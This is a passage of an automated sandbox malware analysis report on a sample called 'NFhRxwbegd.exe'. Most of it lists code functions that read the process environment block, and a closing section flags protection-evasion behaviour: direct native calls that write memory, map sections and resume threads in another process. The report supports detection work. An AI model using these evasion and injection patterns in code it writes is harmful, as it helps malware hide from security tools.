                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D8550 mov eax, dword ptr fs:[00000030h]5_2_018D8550
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190656A mov eax, dword ptr fs:[00000030h]5_2_0190656A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190656A mov eax, dword ptr fs:[00000030h]5_2_0190656A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190656A mov eax, dword ptr fs:[00000030h]5_2_0190656A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0198A49A mov eax, dword ptr fs:[00000030h]5_2_0198A49A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019044B0 mov ecx, dword ptr fs:[00000030h]5_2_019044B0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195A4B0 mov eax, dword ptr fs:[00000030h]5_2_0195A4B0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D64AB mov eax, dword ptr fs:[00000030h]5_2_018D64AB
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D04E5 mov ecx, dword ptr fs:[00000030h]5_2_018D04E5
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01908402 mov eax, dword ptr fs:[00000030h]5_2_01908402
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01908402 mov eax, dword ptr fs:[00000030h]5_2_01908402
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01908402 mov eax, dword ptr fs:[00000030h]5_2_01908402
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A430 mov eax, dword ptr fs:[00000030h]5_2_0190A430
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CC427 mov eax, dword ptr fs:[00000030h]5_2_018CC427
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CE420 mov eax, dword ptr fs:[00000030h]5_2_018CE420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CE420 mov eax, dword ptr fs:[00000030h]5_2_018CE420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CE420 mov eax, dword ptr fs:[00000030h]5_2_018CE420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956420 mov eax, dword ptr fs:[00000030h]5_2_01956420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956420 mov eax, dword ptr fs:[00000030h]5_2_01956420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956420 mov eax, dword ptr fs:[00000030h]5_2_01956420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956420 mov eax, dword ptr fs:[00000030h]5_2_01956420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956420 mov eax, dword ptr fs:[00000030h]5_2_01956420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956420 mov eax, dword ptr fs:[00000030h]5_2_01956420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956420 mov eax, dword ptr fs:[00000030h]5_2_01956420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0198A456 mov eax, dword ptr fs:[00000030h]5_2_0198A456
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018C645D mov eax, dword ptr fs:[00000030h]5_2_018C645D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F245A mov eax, dword ptr fs:[00000030h]5_2_018F245A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195C460 mov ecx, dword ptr fs:[00000030h]5_2_0195C460
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FA470 mov eax, dword ptr fs:[00000030h]5_2_018FA470
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FA470 mov eax, dword ptr fs:[00000030h]5_2_018FA470
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FA470 mov eax, dword ptr fs:[00000030h]5_2_018FA470
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197678E mov eax, dword ptr fs:[00000030h]5_2_0197678E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D07AF mov eax, dword ptr fs:[00000030h]5_2_018D07AF
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019847A0 mov eax, dword ptr fs:[00000030h]5_2_019847A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DC7C0 mov eax, dword ptr fs:[00000030h]5_2_018DC7C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019507C3 mov eax, dword ptr fs:[00000030h]5_2_019507C3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F27ED mov eax, dword ptr fs:[00000030h]5_2_018F27ED
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F27ED mov eax, dword ptr fs:[00000030h]5_2_018F27ED
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F27ED mov eax, dword ptr fs:[00000030h]5_2_018F27ED
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195E7E1 mov eax, dword ptr fs:[00000030h]5_2_0195E7E1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D47FB mov eax, dword ptr fs:[00000030h]5_2_018D47FB
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D47FB mov eax, dword ptr fs:[00000030h]5_2_018D47FB
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01900710 mov eax, dword ptr fs:[00000030h]5_2_01900710
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C700 mov eax, dword ptr fs:[00000030h]5_2_0190C700
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D0710 mov eax, dword ptr fs:[00000030h]5_2_018D0710
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194C730 mov eax, dword ptr fs:[00000030h]5_2_0194C730
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190273C mov eax, dword ptr fs:[00000030h]5_2_0190273C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190273C mov ecx, dword ptr fs:[00000030h]5_2_0190273C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190273C mov eax, dword ptr fs:[00000030h]5_2_0190273C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C720 mov eax, dword ptr fs:[00000030h]5_2_0190C720
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C720 mov eax, dword ptr fs:[00000030h]5_2_0190C720
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01954755 mov eax, dword ptr fs:[00000030h]5_2_01954755
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912750 mov eax, dword ptr fs:[00000030h]5_2_01912750
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912750 mov eax, dword ptr fs:[00000030h]5_2_01912750
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195E75D mov eax, dword ptr fs:[00000030h]5_2_0195E75D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D0750 mov eax, dword ptr fs:[00000030h]5_2_018D0750
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190674D mov esi, dword ptr fs:[00000030h]5_2_0190674D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190674D mov eax, dword ptr fs:[00000030h]5_2_0190674D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190674D mov eax, dword ptr fs:[00000030h]5_2_0190674D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D8770 mov eax, dword ptr fs:[00000030h]5_2_018D8770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D4690 mov eax, dword ptr fs:[00000030h]5_2_018D4690
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D4690 mov eax, dword ptr fs:[00000030h]5_2_018D4690
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019066B0 mov eax, dword ptr fs:[00000030h]5_2_019066B0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C6A6 mov eax, dword ptr fs:[00000030h]5_2_0190C6A6
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0190A6C7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A6C7 mov eax, dword ptr fs:[00000030h]5_2_0190A6C7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019506F1 mov eax, dword ptr fs:[00000030h]5_2_019506F1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019506F1 mov eax, dword ptr fs:[00000030h]5_2_019506F1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E6F2 mov eax, dword ptr fs:[00000030h]5_2_0194E6F2
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E6F2 mov eax, dword ptr fs:[00000030h]5_2_0194E6F2
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E6F2 mov eax, dword ptr fs:[00000030h]5_2_0194E6F2
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E6F2 mov eax, dword ptr fs:[00000030h]5_2_0194E6F2
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E260B mov eax, dword ptr fs:[00000030h]5_2_018E260B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E260B mov eax, dword ptr fs:[00000030h]5_2_018E260B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E260B mov eax, dword ptr fs:[00000030h]5_2_018E260B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E260B mov eax, dword ptr fs:[00000030h]5_2_018E260B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E260B mov eax, dword ptr fs:[00000030h]5_2_018E260B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E260B mov eax, dword ptr fs:[00000030h]5_2_018E260B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E260B mov eax, dword ptr fs:[00000030h]5_2_018E260B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912619 mov eax, dword ptr fs:[00000030h]5_2_01912619
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E609 mov eax, dword ptr fs:[00000030h]5_2_0194E609
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D262C mov eax, dword ptr fs:[00000030h]5_2_018D262C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EE627 mov eax, dword ptr fs:[00000030h]5_2_018EE627
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01906620 mov eax, dword ptr fs:[00000030h]5_2_01906620
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01908620 mov eax, dword ptr fs:[00000030h]5_2_01908620
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EC640 mov eax, dword ptr fs:[00000030h]5_2_018EC640
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01902674 mov eax, dword ptr fs:[00000030h]5_2_01902674
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A660 mov eax, dword ptr fs:[00000030h]5_2_0190A660
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A660 mov eax, dword ptr fs:[00000030h]5_2_0190A660
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199866E mov eax, dword ptr fs:[00000030h]5_2_0199866E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199866E mov eax, dword ptr fs:[00000030h]5_2_0199866E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D09AD mov eax, dword ptr fs:[00000030h]5_2_018D09AD
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D09AD mov eax, dword ptr fs:[00000030h]5_2_018D09AD
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019589B3 mov esi, dword ptr fs:[00000030h]5_2_019589B3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019589B3 mov eax, dword ptr fs:[00000030h]5_2_019589B3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019589B3 mov eax, dword ptr fs:[00000030h]5_2_019589B3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019049D0 mov eax, dword ptr fs:[00000030h]5_2_019049D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199A9D3 mov eax, dword ptr fs:[00000030h]5_2_0199A9D3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019669C0 mov eax, dword ptr fs:[00000030h]5_2_019669C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA9D0 mov eax, dword ptr fs:[00000030h]5_2_018DA9D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA9D0 mov eax, dword ptr fs:[00000030h]5_2_018DA9D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA9D0 mov eax, dword ptr fs:[00000030h]5_2_018DA9D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA9D0 mov eax, dword ptr fs:[00000030h]5_2_018DA9D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA9D0 mov eax, dword ptr fs:[00000030h]5_2_018DA9D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA9D0 mov eax, dword ptr fs:[00000030h]5_2_018DA9D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019029F9 mov eax, dword ptr fs:[00000030h]5_2_019029F9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019029F9 mov eax, dword ptr fs:[00000030h]5_2_019029F9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195E9E0 mov eax, dword ptr fs:[00000030h]5_2_0195E9E0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195C912 mov eax, dword ptr fs:[00000030h]5_2_0195C912
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018C8918 mov eax, dword ptr fs:[00000030h]5_2_018C8918
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018C8918 mov eax, dword ptr fs:[00000030h]5_2_018C8918
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E908 mov eax, dword ptr fs:[00000030h]5_2_0194E908
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E908 mov eax, dword ptr fs:[00000030h]5_2_0194E908
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0196892B mov eax, dword ptr fs:[00000030h]5_2_0196892B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195892A mov eax, dword ptr fs:[00000030h]5_2_0195892A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01950946 mov eax, dword ptr fs:[00000030h]5_2_01950946
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195C97C mov eax, dword ptr fs:[00000030h]5_2_0195C97C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F6962 mov eax, dword ptr fs:[00000030h]5_2_018F6962
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F6962 mov eax, dword ptr fs:[00000030h]5_2_018F6962
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F6962 mov eax, dword ptr fs:[00000030h]5_2_018F6962
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01974978 mov eax, dword ptr fs:[00000030h]5_2_01974978
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01974978 mov eax, dword ptr fs:[00000030h]5_2_01974978
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0191096E mov eax, dword ptr fs:[00000030h]5_2_0191096E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0191096E mov edx, dword ptr fs:[00000030h]5_2_0191096E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0191096E mov eax, dword ptr fs:[00000030h]5_2_0191096E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195C89D mov eax, dword ptr fs:[00000030h]5_2_0195C89D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D0887 mov eax, dword ptr fs:[00000030h]5_2_018D0887
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE8C0 mov eax, dword ptr fs:[00000030h]5_2_018FE8C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C8F9 mov eax, dword ptr fs:[00000030h]5_2_0190C8F9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C8F9 mov eax, dword ptr fs:[00000030h]5_2_0190C8F9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199A8E4 mov eax, dword ptr fs:[00000030h]5_2_0199A8E4
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195C810 mov eax, dword ptr fs:[00000030h]5_2_0195C810
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A830 mov eax, dword ptr fs:[00000030h]5_2_0190A830
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197483A mov eax, dword ptr fs:[00000030h]5_2_0197483A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197483A mov eax, dword ptr fs:[00000030h]5_2_0197483A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F2835 mov eax, dword ptr fs:[00000030h]5_2_018F2835
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F2835 mov eax, dword ptr fs:[00000030h]5_2_018F2835
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F2835 mov eax, dword ptr fs:[00000030h]5_2_018F2835
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F2835 mov ecx, dword ptr fs:[00000030h]5_2_018F2835
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F2835 mov eax, dword ptr fs:[00000030h]5_2_018F2835
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F2835 mov eax, dword ptr fs:[00000030h]5_2_018F2835
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01900854 mov eax, dword ptr fs:[00000030h]5_2_01900854
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E2840 mov ecx, dword ptr fs:[00000030h]5_2_018E2840
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D4859 mov eax, dword ptr fs:[00000030h]5_2_018D4859
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D4859 mov eax, dword ptr fs:[00000030h]5_2_018D4859
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtResumeThread: Direct from: 0x773836AC
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtMapViewOfSection: Direct from: 0x77382D1C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtSetInformationThread: Direct from: 0x773763F9
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtCreateMutant: Direct from: 0x773835CC
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtNotifyChangeKey: Direct from: 0x77383C2C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtSetInformationProcess: Direct from: 0x77382C5C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtCreateUserProcess: Direct from: 0x7738371C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtQueryInformationProcess: Direct from: 0x77382C26
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtResumeThread: Direct from: 0x77382FBC
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtWriteVirtualMemory: Direct from: 0x7738490C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtReadFile: Direct from: 0x77382ADC
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtDelayExecution: Direct from: 0x77382DDC
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtQuerySystemInformation: Direct from: 0x77382DFC
